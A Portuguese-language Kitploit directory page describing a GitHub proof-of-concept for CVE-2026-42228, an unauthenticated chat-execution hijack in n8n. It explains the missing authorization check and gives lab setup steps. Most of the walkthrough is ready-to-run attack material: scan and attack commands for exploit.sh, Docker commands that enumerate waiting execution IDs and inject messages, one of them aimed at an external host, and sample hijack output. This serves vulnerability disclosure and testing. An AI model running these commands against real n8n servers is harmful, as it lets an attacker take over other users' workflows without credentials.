Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42228 — Prova de conceito de exploit para CVE-2026-42228, uma vulnerabilidade de sequestro de execução de chat não autenticada no n8n, com scripts automatizados de varredura e ataque. | Kitploit
Ferramentas/GitHubGitHub/rudsarkar/cve-2026-42228
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubrudsarkar/cve-2026-42228

CVE-2026-42228

Prova de conceito de exploit para CVE-2026-42228, uma vulnerabilidade de sequestro de execução de chat não autenticada no n8n, com scripts automatizados de varredura e ataque.

Ver Repositório
6há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GHSA-f77h-j2v7-g6mw — Sequestro de Execução de Chat Não Autenticado no n8n

CVE: CVE-2026-42228
Severidade: Alta
Afetados: n8n < 1.123.32
Corrigido em: n8n 1.123.32 / 2.17.4 / 2.18.1


Resumo da Vulnerabilidade

chat-service.ts :: startSession() aceita um executionId da string de consulta do WebSocket e apenas verifica se a execução existe no banco de dados. Nunca verifica se o chamador está autorizado a acessar essa execução.

Um atacante não autenticado que conhece (ou consegue enumerar) um ID de execução numérico válido para uma execução no estado aguardando pode:

  1. Conectar-se ao WebSocket /chat sem credenciais.
  2. Receber o prompt pendente que está sendo exibido a um usuário legítimo.
  3. Injetar entrada de chat arbitrária que retoma — e sequestra — o workflow.

Pré-requisitos:

  • Um workflow de Chat Hospedado público com Autenticação = Nenhuma está ativo.
  • Pelo menos uma execução está atualmente no estado aguardando.
  • O atacante pode adivinhar ou enumerar o ID de execução numérico (inteiros sequenciais).

Configuração do Laboratório

Requisitos

  • Docker ≥ 24 com Compose v2
  • Porta 5678 livre no localhost

Configuração com um comando

root@kitploit:~
chmod +x exploit.sh
./exploit.sh setup

Isso baixa n8nio/n8n:1.123.22 (última versão afetada), cria a imagem do atacante e inicia o alvo vulnerável em http://localhost:5678.


Demonstração do Exploit de Ponta a Ponta

1. Configurar o alvo vulnerável

  1. Abra http://localhost:5678 e conclua o assistente de configuração (quaisquer credenciais).
  2. Crie um novo workflow.
  3. Adicione um nó Chat Trigger → defina Autenticação = Nenhuma.
  4. Adicione um nó Wait (ou qualquer nó que pause para entrada do usuário) após o trigger.
  5. Ative o workflow.

2. Disparar uma execução em aguardando

Abra a URL pública do Chat exibida no nó Chat Trigger e envie uma mensagem. A execução entrará no estado aguardando, pausada para a próxima resposta do chat.

3. Escanear execuções em aguardando (não autenticado)

root@kitploit:~
./exploit.sh scan
# ou especifique um intervalo:
./exploit.sh scan 1 500

Saída esperada quando uma execução vulnerável é encontrada:

root@kitploit:~
[+] WAITING execution found! exec_id=7
    Server said: 'n8n|continue'
    Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
    [!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'

4. Atacar um ID de execução conhecido diretamente

root@kitploit:~
./exploit.sh attack 7
# ou com um payload personalizado:
./exploit.sh attack 7 "custom injected message"

5. Observar o sequestro

De volta ao editor do n8n, o workflow é retomado com a mensagem injetada pelo atacante em vez da entrada do usuário legítimo.


Comandos Manuais do Docker

root@kitploit:~
# Criar a imagem do atacante
docker build -t n8n-chat-hijack-poc .

# Escanear (anexa à rede compartilhada do laboratório)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --start-id 1 --end-id 200

# Atacar uma execução específica
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --exec-id 7 --inject "PWNED"

# Contra um alvo externo (sem necessidade de flag de rede)
docker run --rm n8n-chat-hijack-poc \
    --target https://n8n.example.com \
    --exec-id 42 --inject "PWNED"

Limpeza

root@kitploit:~
./exploit.sh clean

Para os contêineres e remove os volumes (incluindo o banco de dados SQLite).


Arquivos

ArquivoDescrição
poc_GHSA-f77h-j2v7-g6mw.pyPoC Python autônomo
DockerfileImagem do contêiner do atacante

Referências

  • GHSA-f77h-j2v7-g6mw
  • Changelog da versão 1.123.32 do n8n
Baixar ferramenta
docker-compose.ymlLaboratório completo: n8n vulnerável + atacante
exploit.shScript auxiliar para operações comuns